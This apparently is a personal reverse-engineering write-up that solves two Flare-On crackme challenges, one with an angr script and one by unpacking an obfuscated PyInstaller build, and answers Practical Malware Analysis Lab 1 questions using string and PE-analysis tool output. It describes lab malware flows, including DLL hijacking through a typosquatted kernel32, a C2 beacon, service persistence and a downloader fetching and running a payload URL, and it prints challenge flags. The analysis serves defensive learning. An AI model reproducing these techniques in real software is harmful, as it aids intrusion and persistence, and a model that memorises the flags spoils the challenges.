└─$ /opt/floss very_success
.
.
.
 ───────────────────────────
  FLOSS STATIC STRINGS (20)
 ───────────────────────────
+----------------------------------+
| FLOSS STATIC STRINGS: ASCII (20) |
+----------------------------------+

.text
.data
PjCh
Pj2hY!@
hY!@
h5!@
hG!@
kernel32.dll
LoadLibraryA
GetProcAddress
GetLastError
GetStdHandle
AttachConsole
WriteConsoleA
WriteFile
ReadFile
You crushed that last one! Let's up the game.
Enter the password>
You are success
You are failure
+------------------------------------+
| FLOSS STATIC STRINGS: UTF-16LE (0) |
+------------------------------------+
 ─────────────────────────
  FLOSS STACK STRINGS (0)
 ─────────────────────────
 ─────────────────────────
  FLOSS TIGHT STRINGS (0)
 ─────────────────────────
 ───────────────────────────
  FLOSS DECODED STRINGS (0)
 ───────────────────────────

It gives some kernel32.dll API functions,
Hypothesis: (console-based loader/tool using dynamic API resolution + file I/O operations).

LoadLibraryA
GetProcAddress
GetLastError
GetStdHandle
AttachConsole
WriteConsoleA
WriteFile
ReadFile

Some string related to password things,

You crushed that last one! Let's up the game.
Enter the password>
You are success
You are failure

Advance Static Analysis

I opened it in IDA, and it has only 2 functions and start function,
- sub_401000
- sub_401084

Func1: sub_401000

Func2: sub_401084

This is flow of the whole program,

Gets stdin/stdout handles via GetStdHandle.
Prints a prompt to stdout.
Reads up to 50 bytes from stdin into buffer unk_402159.
Passes that buffer to the validator function.
Prints success or failure message based on return value.

Buffer unk_402159 holds both your input AND the expected hash bytes
Bytes 0–36 → your typed input
Bytes 36+ → hardcoded expected values baked into .data
So the correct key is exactly 37 chars long.

Validator Logic (sub_401084)

Arguments,
- a2 → pointer to expected checksum array (read from a2+36 backwards)
- a3 → your input string
- a4 → input length
Step 1 — Length check: input < 37 → return 0 (fail) immediately
Step 2 — 37-round rolling hash:
- XOR each char with 0xC7 (low byte of 455)
- Rotate 1 left by (v4 & 3) bits, add x86 carry flag + XOR result
- Accumulate result into v4 → affects next round's rotation
Step 3 — Compare: computed byte must match expected[i], mismatch sets v5=0 and breaks early
Returns non-zero if all 37 match, 0 otherwise

Flag Calculation using angr framework

Now this is where it gets interesting. We know the binary takes input, runs it through a 37-round rolling hash, and compares the result against hardcoded expected bytes. "Reversing that hash manually is painful because each round depends on the previous one (stateful accumulator + x86 carry flag)".
So instead of reversing it by hand, we let a tool do the heavy lifting.
We use angr, a binary analysis framework that converts execution into a math problem using symbolic execution.
Instead of running the binary with a real input, angr runs it with symbolic unknowns (think algebra variables), tracks every constraint the binary puts on those unknowns, and hands the whole thing to a solver (Z3) which figures out the exact values that satisfy all constraints.
In short, angr runs the binary with unknown input, explores all possible execution paths simultaneously, and finds the one input that reaches the success branch.
More on angr...

pip install angr claripy

import angr
import claripy

proj = angr.Project('very_success.exe', auto_load_libs=False)

flag = [claripy.BVS(f'c{i}', 8) for i in range(37)]
state = proj.factory.full_init_state(stdin=claripy.Concat(*flag, claripy.BVV(b'\n')))

for c in flag:
    state.solver.add(c >= 0x20, c <= 0x7e)

simgr = proj.factory.simulation_manager(state)
simgr.use_technique(angr.exploration_techniques.Veritesting())
simgr.explore(find=0x0040106B, avoid=0x00401072)

if simgr.found:
    s = simgr.found[0]
    print(b''.join(s.solver.eval(c, cast_to=bytes) for c in flag))

Here is the flag,

a_Little_b1t_harder_plez@flare-on.com

Challenge 3:

Stage 1 - Analyzing the PyInstaller Compiled EXE

Initial Triage

File Type: PE32 executable for MS Windows 5.00 (console), Intel i386
Size: 11.6MB
SHA256: 6b82463eaa13aba88aab9050f08bcc7658067f4dc4d6ca04f49bbda2201cc70b

Basic Static Analysis

Running the sample through Detect It Easy (DIE) immediately tells us something interesting:

32-bit Windows executable (~11.6 MB)
Built with Visual C++ 2008 — but wait, it's actually a Python program packed with PyInstaller
DIE flags it as packed/compressed
There's a large overlay at the end of the file containing zlib-compressed data

Yep, it's packed alright.

This is classic PyInstaller behaviour. When you bundle a Python script with PyInstaller, it doesn't compile it like C/C++ — instead it does something sneakier:

Bundles everything together — your Python script, the Python interpreter, and all required libraries
Packs it into one EXE — the front part is a small C loader, and the actual Python code + libs are stuffed at the end
Stores everything in an overlay — this data is appended after the PE structure, often zlib-compressed, which is exactly why DIE throws up the "strange overlay" warning
At runtime, the loader quietly extracts the embedded data and runs the Python code from memory or a temp folder

So the strategy here is straightforward - we need to unpack it and get to the actual Python code. We can extract the .pyc (compiled bytecode) files using pyinstxtractor:

https://sourceforge.net/projects/pyinstallerextractor/

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~]
└─$ python pyinstxtractor.py elfie

[*] Processing elfie
[*] Pyinstaller version: 2.1+
[*] Python version: 27
[*] Length of package: 12034944 bytes
[*] Found 26 files in CArchive
[*] Beginning extraction...please standby
[!] Warning: The script is running in a different python version than the one used to build the executable
    Run this script in Python27 to prevent extraction errors(if any) during unmarshalling
[*] Found 244 files in PYZ archive
[+] Possible entry point: _pyi_bootstrap
[+] Possible entry point: pyi_carchive
[+] Possible entry point: elfie
[*] Successfully extracted pyinstaller archive: elfie

You can now use a python decompiler on the pyc files within the extracted directory

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
└─$ ls
elfie  elfie_extracted  pyinstxtractor.py

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/elfie_extracted]
└─$ ls
bz2.pyd                      msvcp90.dll              pyi_carchive          python27.dll            _ssl.pyd
elfie                        msvcr90.dll              pyi_importers         QtCore4.dll             struct
elfie.exe.manifest           out00-PYZ.pyz            pyi_os_path           QtGui4.dll              unicodedata.pyd
_hashlib.pyd                 out00-PYZ.pyz_extracted  pyside-python2.7.dll  select.pyd
Microsoft.VC90.CRT.manifest  pyi_archive              PySide.QtCore.pyd     shiboken-python2.7.dll
msvcm90.dll                  _pyi_bootstrap           PySide.QtGui.pyd      _socket.pyd

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/elfie_extracted]
└─$ file elfie
elfie: ASCII text

The elfie file sitting in the extraction directory is our next target — it's a large blob of obfuscated Python code. Time to dig deeper.

Stage 2 - Analyzing of Python Blob

Initial Triage

File Type: Python script, ASCII text executable, with very long lines (65463)
Size: 1348KB
SHA256: 922cc911074008ad494967b41fa48db712293e2572af53e8a5e823ff64c39761

Basic Static Analysis

Opening it up, we're greeted with this beautiful disaster:

O0OO0OO00000OOOO0OOOOO0O00O0O0O0 = 'IRGppV0FJM3BRRlNwWGhNNG'
OO0O0O00OO00OOOOOO0O0O0OOO0OOO0O = 'UczRkNZZ0JVRHJjbnRJUWlJV3FRTkpo'
OOO0000O0OO0OOOOO000O00O0OO0O00O = 'xTStNRDJqZG9nRCtSU1V'
OOO0000O0OO0OOOOO000O00O0OO0O00O += 'Rbk51WXI4dmRaOXlwV3NvME0ySGp'
...
O00OO00OOO0OOOO0OOOO0OO00000OOO0 += 'RabTBrZE'
O00OO00OOO0OOOO0OOOO0OO00000OOO0 += 'VXWFY3QUtiTXFXQVYrenh4amxJZXI1MXd1YWJiWkRaWDRQV0'
O00OO00OOO0OOOO0OOOO0OO00000OOO0 += 'xDUmhGcnRDcnd4VkF5'
O00OO00OOO0OOOO0OOOO0OO00000OOO0 += 'aTBTMXd3OC8yY0ZqdzBIU0JMT0tEcktGckJUTkpvRGw2d'
O00OO00OOO0OOOO0OOOO0OO00000OOO0 += 'nNocTB'
import base64
exec(base64.b64decode(OOO0OOOOOOOO0000O000O00O0OOOO00O +
...
OOO0000O0OO0OOOOO000O00O0OO0O00O + OOO0O00O00OOOOOOO00OOOO0000O0O00 + O0O00OO00O0O00O0O00O0OOO00O0O0OO + O00OOOOO000O00O0O00000OOO0000OOO + O0O0OOO000O000OO0O0O0OOOOO0OO000))

Classic obfuscation, variable names that are just random sequences of 0 and O to make it visually impossible to read.
The trick here is simple though: instead of letting exec() run the decoded payload blindly, we just swap it out for print() and let it tell us what it was about to execute.

Still pretty messy. After cleaning it up a bit, renaming some variables and fixing the formatting, it starts to look more sensible:

There are two large base64 blobs in there.
I decode both of them, and notice they're also reversed, so I reverse them before decoding. Let's see what's inside.

Blob 1:

A glorious meme. 😂 Classic CTF energy.

Blob 2:

Another image. 😗

And then, hiding right there in plain sight the flag, in plaintext, reversed:

Flip it around and we're done:

Elfie.L0000ves.YOOOO@flare-on.com

PMA - Lab Write-up 2026

Mon, 02 Feb 2026 00:00:00 GMT

Category: Malware Analysis and Reverse Engineering
Difficulty: Easy/Medium/Hard
File:- PracticalMalwareAnalysis-Labs.tar.gz

1. Basic Static Techniques

Lab 1-1

1. Upload the files to http://www.VirusTotal.com/ and view the reports. Does either file match any existing antivirus signatures?

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
└─$ sha256sum Lab01-01.exe
58898bd42c5bd3bf9b1389f0eee5b39cd59180e8370eb9ea838a0b327bd6fe47  Lab01-01.exe

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
└─$ sha256sum Lab01-01.dll
f50e42c8dfaab649bde0398867e930b86c2a599e8db83b8260393082268f2dba  Lab01-01.dll

Lab01-01.exe
Code insights:
- The sample is a file infector and system hijacker that employs DLL search order hijacking through typosquatting.
- It copies a malicious payload Lab01-01.dll to '%WINDIR%\System32\kerne132.dll' (mimicking the legitimate kernel32.dll).
- The malware then recursively scans the C: drive for executable files (.exe) and modifies their PE headers, specifically patching the Import Address Table (IAT) to replace references to 'kernel32.dll' with the malicious kerne132.dll.
- This ensures the malicious library is loaded whenever infected applications are executed.

Lab01-01.dll (kerne132.dll)

2. When were these files compiled?

We can see these info inside the details tab of VT,
Lab-01-01.exe

Creation Time: 2010-12-19 16:16:19 UTC 
First Seen In The Wild: 2012-01-08 02:19:06 UTC 
First Submission: 2012-02-16 07:31:54 UTC 
Last Submission: 2026-02-02 07:25:44 UTC 
Last Analysis: 2026-02-01 03:58:36 UTC

Lab-01-01.dll

Creation Time: 2010-12-19 16:16:38 UTC 
First Seen In The Wild: 2010-12-19 09:16:38 UTC 
First Submission: 2011-07-04 19:57:48 UTC 
Last Submission: 2026-02-02 07:27:31 UTC 
Last Analysis: 2026-01-31 11:23:05 UTC

3. Are there any indications that either of these files is packed or obfuscated. If so, what are these indicators?

We can use Detect it Easy (DiE) for this task, it has entropy section which shows the randomness of each section, which can be indicators to see obfuscation.
Lab-01-01.exe (Not Packed)

Lab 01-01.dll (Not Packed)

4. Do any imports hint at what this malware does? If so, which imports are they?

To see imports we can use pestudio,
Lab-01-01.exe
- Imports = Windows API functions that the program calls from DLLs (like KERNEL32.dll).

Start
 └─► CopyFileA()
      └─► Drop malicious DLL
           "Lab01-01.dll"
           ↓
           "%WINDIR%\\System32\\kerne132.dll"
 └─► FindFirstFileA("C:\\*")
      └─► FindNextFileA()
           ├─► If directory
           │     └─► Recurse (FindFirstFileA)
           └─► If *.exe
                 └─► CreateFileA(target.exe)
                      └─► CreateFileMappingA()
                           └─► MapViewOfFile()
                                └─► Parse PE headers
                                     └─► Locate Import Table
                                          └─► Replace:
                                               "kernel32.dll"
                                               ↓
                                               "kerne132.dll"
                                └─► UnmapViewOfFile()
                      └─► CloseHandle()
      └─► Repeat until no files left
 └─► FindClose()
End

Lab-01-01.dll

DLL Loaded (via infected EXE)
 └─► DllMain(DLL_PROCESS_ATTACH)
      └─► CreateMutexA()
           └─► OpenMutexA()
                └─► Ensure single instance (avoid double execution)
      └─► Sleep()
           └─► Timing / sandbox evasion
      └─► WSAStartup()
           └─► Initialize Winsock
      └─► socket()
           └─► Create TCP socket
      └─► inet_addr()
           └─► Convert hardcoded IP address
      └─► htons()
           └─► Convert hardcoded port
      └─► connect()
           └─► Connect to remote C2 server
      └─► send()
           └─► Transmit host data / beacon
      └─► recv()
           └─► Receive attacker commands / response
      └─► shutdown()
           └─► Graceful connection close
      └─► closesocket()
           └─► Release socket
      └─► WSACleanup()
           └─► Cleanup Winsock
      └─► CreateProcessA()
           └─► Execute command or spawn process
      └─► CloseHandle()
End

5. Are there any other files or host-based indicators that you could look for on infected systems?

Examining the strings contained within Lab01-01.exe more closely reveals that it is referencing a file called C:\windows\system32\kerne132.dll.
This is a very subtle misspelling of the legitimate Kernel32.dll file (notice the use of 1 instead of l) because of this it is likely malicious and we are able to use this to search for infected systems.
I used floss tool for strings analysis,

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
└─$ /opt/floss Lab01-01.exe

INFO: floss: extracting static strings
finding decoding function features: 100%|██████████████| 13/13 [00:00<00:00, 1565.44 functions/s, skipped 1 library functions (7%)]
INFO: floss.stackstrings: extracting stackstrings from 9 functions
extracting stackstrings: 100%|███████████████████████████████████████████████████████████████| 9/9 [00:00<00:00, 55.13 functions/s]
INFO: floss.tightstrings: extracting tightstrings from 0 functions...
extracting tightstrings: 0 functions [00:00, ? functions/s]
INFO: floss.string_decoder: decoding strings
emulating function 0x401951 (call 1/1): 100%|████████████████████████████████████████████████| 9/9 [00:01<00:00,  5.48 functions/s]
INFO: floss: finished execution after 6.46 seconds
INFO: floss: rendering results


FLARE FLOSS RESULTS (version v3.1.1-0-g3cd3ee6)

+------------------------+------------------------------------------------------------------------------------+
| file path              | Lab01-01.exe                                                                       |
| identified language    | unknown                                                                            |
| extracted strings      |                                                                                    |
|  static strings        | 71 (648 characters)                                                                |
|   language strings     |  0 (  0 characters)                                                                |
|  stack strings         | 0                                                                                  |
|  tight strings         | 0                                                                                  |
|  decoded strings       | 0                                                                                  |
+------------------------+------------------------------------------------------------------------------------+

.
.
.
CloseHandle
UnmapViewOfFile
IsBadReadPtr
MapViewOfFile
CreateFileMappingA
CreateFileA
FindClose
FindNextFileA
FindFirstFileA
CopyFileA
.
.
.
KERNEL32.dll
malloc
exit
MSVCRT.dll
.
.
.
kerne132.dll
kernel32.dll
.exe
C:\*
C:\windows\system32\kerne132.dll
Kernel32.
Lab01-01.dll
C:\Windows\System32\Kernel32.dll
WARNING_THIS_WILL_DESTROY_YOUR_MACHINE

+------------------------------------+
| FLOSS STATIC STRINGS: UTF-16LE (4) |
+------------------------------------+

@jjj
@jjj
@jjj
@jjj

 ─────────────────────────
  FLOSS STACK STRINGS (0)
 ─────────────────────────

 ─────────────────────────
  FLOSS TIGHT STRINGS (0)
 ─────────────────────────

 ───────────────────────────
  FLOSS DECODED STRINGS (0)
 ───────────────────────────

So this is the C:\windows\system32\kerne132.dll which is loaded so this can be another indicator in host system.

6. What network-based indicators could be used to find this malware on infected machines?

Lab-01-01.dll
Examining the strings contained within Lab01-01.dll more closely reveals that there is what appears to be an IP address.
Because of this and the network imports, it is highly likely that this DLL contacts this IP address, and as such we are able to use this to find infected systems which have contacted 127.26.152.13.

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
└─$ /opt/floss Lab01-01.dll

INFO: floss: extracting static strings
finding decoding function features: 100%|███████████████| 5/5 [00:00<00:00, 2200.12 functions/s, skipped 2 library functions (40%)]
INFO: floss.stackstrings: extracting stackstrings from 1 functions
extracting stackstrings: 100%|███████████████████████████████████████████████████████████████| 1/1 [00:00<00:00, 40.17 functions/s]
INFO: floss.tightstrings: extracting tightstrings from 0 functions...
extracting tightstrings: 0 functions [00:00, ? functions/s]
INFO: floss.string_decoder: decoding strings
emulating function 0x10001010 (call 1/1): 100%|██████████████████████████████████████████████| 1/1 [00:00<00:00, 60.43 functions/s]
INFO: floss: finished execution after 4.67 seconds
INFO: floss: rendering results


FLARE FLOSS RESULTS (version v3.1.1-0-g3cd3ee6)

+------------------------+------------------------------------------------------------------------------------+
| file path              | Lab01-01.dll                                                                       |
| identified language    | unknown                                                                            |
| extracted strings      |                                                                                    |
|  static strings        | 37 (301 characters)                                                                |
|   language strings     |  0 (  0 characters)                                                                |
|  stack strings         | 0                                                                                  |
|  tight strings         | 0                                                                                  |
|  decoded strings       | 0                                                                                  |
+------------------------+------------------------------------------------------------------------------------+


 ───────────────────────────
  FLOSS STATIC STRINGS (37)
 ───────────────────────────

+----------------------------------+
| FLOSS STATIC STRINGS: ASCII (37) |
+----------------------------------+

!This program cannot be run in DOS mode.
Rich
.text
`.rdata
@.data
.
.
.
CloseHandle
Sleep
CreateProcessA
CreateMutexA
OpenMutexA
KERNEL32.dll
WS2_32.dll
.
.
.
exec
sleep
hello
127.26.152.13
.
.
.
+------------------------------------+
| FLOSS STATIC STRINGS: UTF-16LE (0) |
+------------------------------------+

 ─────────────────────────
  FLOSS STACK STRINGS (0)
 ─────────────────────────

 ─────────────────────────
  FLOSS TIGHT STRINGS (0)
 ─────────────────────────

 ───────────────────────────
  FLOSS DECODED STRINGS (0)
 ───────────────────────────

7. What would you guess is the purpose of these files?

Based on the observations above, the executable appears to function primarily as a loader for a malicious DLL that acts as a backdoor or remote access trojan (RAT).
Analysis of its imported functions suggests that the executable checks for the presence of C:\Windows\System32\kerne132.dll and, if absent, copies the malicious DLL to this location to establish persistence.
Once loaded, the DLL likely initiates outbound communication to a command-and-control (C2) server at 127.26.152.13.

Lab 1-2

1. Upload the Lab01-02.exe file to http://www.VirusTotal.com/. Does it match any existing antivirus definitions?

Lab-01-02.exe
Code insights
- The binary is a packed (UPX) malware that establishes persistence by installing itself as a Windows service.
- It uses CreateServiceA to create a service named Malservice configured to start automatically.
- It also ensures only a single instance runs by creating a mutex named HGL345.
- Network capabilities are present via InternetOpenUrlA to connect to www[.]malwareanalysisbook[.]com, likely for C2 communication or downloading a next-stage payload.

2. Are there any indications that this file is packed or obfuscated? If so, what are these indicators? If the file is packed, unpack it if possible.

It is packed with UPX which is a popular packer,
As we can see in entropy section, there are 2 section named UPX,
The first UPX section (UPX1) contains the compressed payload, while the second section (UPX2) contains the unpacking stub and runtime code.

To unpack this file we can use upx itself,

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
└─$ upx -d Lab01-02.exe
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2024
UPX 4.2.4       Markus Oberhumer, Laszlo Molnar & John Reiser    May 9th 2024

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     16384 <-      3072   18.75%    win32/pe     Lab01-02.exe

Unpacked 1 file.

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~]
└─$ mv Lab01-02.exe Lab01-02.exe.enpacked

Lab-01-02.exe.unpacked,
- Everything is unpacked and we can see all he section.

3. Do any imports hint at this program’s functionality? If so, which imports are they and what do they tell you?

Again, we can use pestudio to see imports,

Start
 └─► CreateMutexA()
      └─► OpenMutexA()
           └─► Ensure single instance
 └─► GetModuleFileNameA()
      └─► Resolve own executable path
 └─► CreateThread()
      └─► Run main malicious routine asynchronously
 └─► CreateWaitableTimerA()
      └─► SetWaitableTimer()
           └─► WaitForSingleObject()
                └─► Periodic || delayed execution
 └─► OpenSCManagerA()
      └─► Connect to Service Control Manager
 └─► CreateServiceA()
      └─► Install malicious service
 └─► StartServiceCtrlDispatcherA()
      └─► Register service entry point
 └─► InternetOpenA()
      └─► Initialize WinINet
 └─► InternetOpenUrlA()
      └─► Connect to remote URL (C2 / payload host)

4. What host- or network-based indicators could be used to identify this malware on infected machines?

I used floss for strings analysis, - We got the C2 domain, hxxp://www[.]malwareanalysisbook[.]com

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
└─$ /opt/floss Lab01-02.exe.unpacked

INFO: floss: extracting static strings
finding decoding function features: 100%|█████████████| 10/10 [00:00<00:00, 4278.59 functions/s, skipped 1 library functions (10%)]
INFO: floss.stackstrings: extracting stackstrings from 6 functions
extracting stackstrings: 100%|██████████████████████████████████████████████████████████████| 6/6 [00:00<00:00, 167.70 functions/s]
INFO: floss.tightstrings: extracting tightstrings from 0 functions...
extracting tightstrings: 0 functions [00:00, ? functions/s]
INFO: floss.string_decoder: decoding strings
emulating function 0x4012c1 (call 1/1): 100%|████████████████████████████████████████████████| 6/6 [00:00<00:00, 58.90 functions/s]
INFO: floss: finished execution after 4.92 seconds
INFO: floss: rendering results


FLARE FLOSS RESULTS (version v3.1.1-0-g3cd3ee6)

+------------------------+------------------------------------------------------------------------------------+
| file path              | Lab01-02.exe.unpacked                                                              |
| identified language    | unknown                                                                            |
| extracted strings      |                                                                                    |
|  static strings        | 58 (625 characters)                                                                |
|   language strings     |  0 (  0 characters)                                                                |
|  stack strings         | 0                                                                                  |
|  tight strings         | 0                                                                                  |
|  decoded strings       | 0                                                                                  |
+------------------------+------------------------------------------------------------------------------------+


 ───────────────────────────
  FLOSS STATIC STRINGS (58)
 ───────────────────────────

+----------------------------------+
| FLOSS STATIC STRINGS: ASCII (55) |
+----------------------------------+

!This program cannot be run in DOS mode.
Rich
.text
`.rdata
@.data
.
.
.
KERNEL32.DLL
ADVAPI32.dll
MSVCRT.dll
WININET.dll
SystemTimeToFileTime
GetModuleFileNameA
CreateWaitableTimerA
ExitProcess
OpenMutexA
SetWaitableTimer
WaitForSingleObject
CreateMutexA
CreateThread
CreateServiceA
StartServiceCtrlDispatcherA
OpenSCManagerA
.
.
.
InternetOpenUrlA
InternetOpenA
MalService
Malservice
HGL345
http://www.malwareanalysisbook.com
Internet Explorer 8.0


+------------------------------------+
| FLOSS STATIC STRINGS: UTF-16LE (3) |
+------------------------------------+

@jjjj
@jjj
@jjj


 ─────────────────────────
  FLOSS STACK STRINGS (0)
 ─────────────────────────

 ─────────────────────────
  FLOSS TIGHT STRINGS (0)
 ─────────────────────────

 ───────────────────────────
  FLOSS DECODED STRINGS (0)
 ───────────────────────────

Lab 1-3

1. Upload the Lab01-03.exe file to http://www.VirusTotal.com/. Does it match any existing antivirus definitions?

Lab01-03.exe
Code insights
- The sample demonstrates behavior typical of adware or a Trojan-Clicker.
- It initializes OLE/COM and uses CoCreateInstance to instantiate a web browser object (likely IWebBrowser2).
- It then invokes the Navigate method (offset 0x2c) to automatically redirect the user to a hardcoded URL: http://www.malwareanalysisbook.com/ad.html.
- This action is performed without user interaction immediately upon execution.

2. Are there any indications that this file is packed or obfuscated? If so, what are these indicators? If the file is packed, unpack it if possible.

Here is the output of Detect-it-Easy, and entropy show nothing,
- Here is the Breakdown:
  - OS & Architecture: Windows 95/32-bit : just an identification hint, likely the minimum required OS.
  - Language: ASMx86 - compiled from low-level assembly (common in small labs or malware).
  - Protection:
    - Generic[Strange sections + Custom DOS] - unusual PE structure, maybe packed or manually crafted.
  - Packer:
    - Compressed or packed data[Section names repeating] - file is likely packed or obfuscated (maybe UPX or custom packer).

)

So i used another tool pe-detective and it shows that it FSG v1.00 (Eng) → dulek/xt,
The binary is packed with FSG (Fast Small Good) v1.00, a PE executable packer, written by dulek from the xt (Xtream / Xtreme) group.

3. Do any imports hint at this program’s functionality? If so, which imports are they and what do they tell you?

I used pestudio to see imports, it has only 2.

4. What host- or network-based indicators could be used to identify this malware on infected machines?

It is a future topic that will be covered so for now we pause here.

Lab 1-4

1. Upload the Lab01-04.exe file to http://www.VirusTotal.com/. Does it match any existing antivirus definitions?

Lab-01-04.exe
- Code Insights
  - This binary is a downloader.
  - It uses the URLDownloadToFileA function to download an executable from http://www.practicalmalwareanalysis.com/updater.exe.
  - The downloaded file is saved to the system directory as C:\Windows\system32\wupdmgrd.exe and then executed via WinExec.
  - This behavior of downloading and executing a remote payload is unequivocally malicious.

2. Are there any indications that this file is packed or obfuscated? If so, what are these indicators? If the file is packed, unpack it if possible.

This time i used diec which is CLI version of Detect-it-Easy,
- Which shows that it is build using cpp in visual studio.
- And entropy says that it is not packed indeed.

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
└─$ diec -u --verbose Lab01-04.exe

[HEUR/About] Generic Heuristic Analysis by DosX (@DosX_dev)
[HEUR] Scanning has begun!
[HEUR] Scanning to programming language has started!
[HEUR/Any] C library present -> "msvcrt.dll"
[HEUR] Scan completed.
PE32
    Operation system: Windows(95)[I386, 32-bit, GUI]
    Linker: Microsoft Linker(6.00.8168)
    Compiler: Microsoft Visual C/C++(12.00.8168)[C++/std]
    Language: C++
    Tool: Visual Studio(6.0)
    
    
┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
└─$ diec Lab01-04.exe -e

Total 1.17687: not packed
  0|PE Header|0|4096|0.671276: not packed
  1|Section(0)['.text']|4096|4096|3.12359: not packed
  2|Section(1)['.rdata']|8192|4096|1.59136: not packed
  3|Section(2)['.data']|12288|4096|0.50793: not packed
  4|Section(3)['.rsrc']|16384|20480|0.712982: not packed

3. When was this program compiled?

For this task i can use readpe which is cli alternative of pestudio,
- Fri, 30 Aug 2019 22:26:59 UTC

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
└─$ readpe -H Lab01-04.exe | grep time
    Date/time stamp:                 1567204019 (Fri, 30 Aug 2019 22:26:59 UTC)

4. Do any imports hint at this program’s functionality? If so, which imports are they and what do they tell you?

There is another tool pecli used for which can be used to get PE info like imports etc.

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
└─$ pecli info Lab01-04.exe

Metadata
================================================================================
...

Sections
================================================================================
...

Imports
================================================================================
KERNEL32.dll
        0x402010 GetProcAddress
        0x402014 LoadLibraryA
        0x402018 WinExec
        0x40201c WriteFile
        0x402020 CreateFileA
        0x402024 SizeofResource
        0x402028 CreateRemoteThread
        0x40202c FindResourceA
        0x402030 GetModuleHandleA
        0x402034 GetWindowsDirectoryA
        0x402038 MoveFileA
        0x40203c GetTempPathA
        0x402040 GetCurrentProcess
        0x402044 OpenProcess
        0x402048 CloseHandle
        0x40204c LoadResource
ADVAPI32.dll
        0x402000 OpenProcessToken
        0x402004 LookupPrivilegeValueA
        0x402008 AdjustTokenPrivileges
MSVCRT.dll
        0x402054 _snprintf
        0x402058 _exit
        0x40205c _XcptFilter
        0x402060 exit
        0x402064 __p___initenv
        0x402068 __getmainargs
        0x40206c _initterm
        0x402070 __setusermatherr
        0x402074 _adjust_fdiv
        0x402078 __p__commode
        0x40207c __p__fmode
        0x402080 __set_app_type
        0x402084 _except_handler3
        0x402088 _controlfp
        0x40208c _stricmp


Resources:
================================================================================
...

This is pestudio output because it gives sus potential malicious imports as red flags,

Potential Program Flow,
- This executable extracts an embedded payload, writes it to disk, elevates privileges, and executes or injects the payload into another process, indicating a dropper with privilege escalation and injection capabilities.

Start
 └─► LoadLibraryA()
      └─► GetProcAddress()
           └─► Dynamically resolve APIs (evasion || flexibility)
 └─► FindResourceA()
      └─► SizeofResource()
           └─► LoadResource()
                └─► Extract embedded payload from resources
 └─► GetTempPathA()
      └─► CreateFileA(temp_file)
           └─► WriteFile()
                └─► Drop extracted payload to disk
 └─► GetWindowsDirectoryA()
      └─► MoveFileA()
           └─► Relocate payload to Windows directory
 └─► OpenProcessToken(GetCurrentProcess())
      └─► LookupPrivilegeValueA()
           └─► AdjustTokenPrivileges()
                └─► Enable elevated privileges
 └─► GetCurrentProcess()
      └─► OpenProcess()
           └─► CreateRemoteThread()
                └─► Inject payload into target process
 └─► WinExec()
      └─► Execute dropped payload
 └─► CloseHandle()
 └─► ExitProcess()
End

5. What host or network-based indicators could be used to identify this malware on infected machines?

I used floss for strings analysis,
This is the C2 domain which is downloading stage2, hxxp[:]//www[.]practicalmalwareanalysis[.]com/updater[.]exe and it is being put into \system32\wupdmgrd.exe with this name and being executed using WinExec.

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
└─$ /opt/floss Lab01-04.exe

INFO: floss: extracting static strings
finding decoding function features: 100%|██████████████| 13/13 [00:00<00:00, 2269.17 functions/s, skipped 1 library functions (7%)]
INFO: floss.stackstrings: extracting stackstrings from 8 functions
extracting stackstrings: 100%|██████████████████████████████████████████████████████████████| 8/8 [00:00<00:00, 105.67 functions/s]
INFO: floss.tightstrings: extracting tightstrings from 0 functions...
extracting tightstrings: 0 functions [00:00, ? functions/s]
INFO: floss.string_decoder: decoding strings
emulating function 0x401701 (call 1/1): 100%|████████████████████████████████████████████████| 8/8 [00:00<00:00, 46.70 functions/s]
INFO: floss: finished execution after 4.77 seconds
INFO: floss: rendering results


FLARE FLOSS RESULTS (version v3.1.1-0-g3cd3ee6)

+------------------------+------------------------------------------------------------------------------------+
| file path              | Lab01-04.exe                                                                       |
| identified language    | unknown                                                                            |
| extracted strings      |                                                                                    |
|  static strings        | 114 (1210 characters)                                                              |
|   language strings     |   0 (   0 characters)                                                              |
|  stack strings         | 0                                                                                  |
|  tight strings         | 0                                                                                  |
|  decoded strings       | 0                                                                                  |
+------------------------+------------------------------------------------------------------------------------+


 ────────────────────────────
  FLOSS STATIC STRINGS (114)
 ────────────────────────────

+-----------------------------------+
| FLOSS STATIC STRINGS: ASCII (114) |
+-----------------------------------+

!This program cannot be run in DOS mode.
Rich
.
.
.
CloseHandle
OpenProcess
GetCurrentProcess
CreateRemoteThread
GetProcAddress
LoadLibraryA
WinExec
WriteFile
CreateFileA
SizeofResource
LoadResource
FindResourceA
GetModuleHandleA
GetWindowsDirectoryA
MoveFileA
GetTempPathA
KERNEL32.dll
AdjustTokenPrivileges
LookupPrivilegeValueA
OpenProcessToken
ADVAPI32.dll
_snprintf
.
.
.
%s%s
\winup.exe
%s%s
!This program cannot be run in DOS mode.
Rich
.text
.
.
.
GetWindowsDirectoryA
WinExec
GetTempPathA
KERNEL32.dll
URLDownloadToFileA
urlmon.dll
.
.
.
\winup.exe
%s%s
\system32\wupdmgrd.exe
%s%s
http://www.practicalmalwareanalysis.com/updater.exe

+------------------------------------+
| FLOSS STATIC STRINGS: UTF-16LE (0) |
+------------------------------------+

 ─────────────────────────
  FLOSS STACK STRINGS (0)
 ─────────────────────────

 ─────────────────────────
  FLOSS TIGHT STRINGS (0)
 ─────────────────────────

 ───────────────────────────
  FLOSS DECODED STRINGS (0)
 ───────────────────────────

6. This file has one resource in the resource section. Use Resource Hacker to examine that resource, and then use it to extract the resource. What can you learn from the resource?

In PEstudio, if we inspect resource of this file we can see that it has another exe embedded so we can carve it.
